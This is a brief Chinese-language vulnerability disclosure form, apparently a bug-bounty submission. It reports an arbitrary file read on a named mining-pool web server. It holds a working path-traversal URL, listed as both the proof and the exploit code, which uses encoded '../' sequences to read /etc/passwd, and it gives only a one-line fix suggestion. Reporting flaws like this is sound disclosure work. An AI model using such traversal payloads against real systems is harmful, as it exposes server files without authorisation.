漏洞URL:如果是Web就填写此项
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
简要描述:漏洞说明、利用条件、危害等
任意文件读取
漏洞证明:
漏洞利用代码:
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
修复方案:
从代码层修改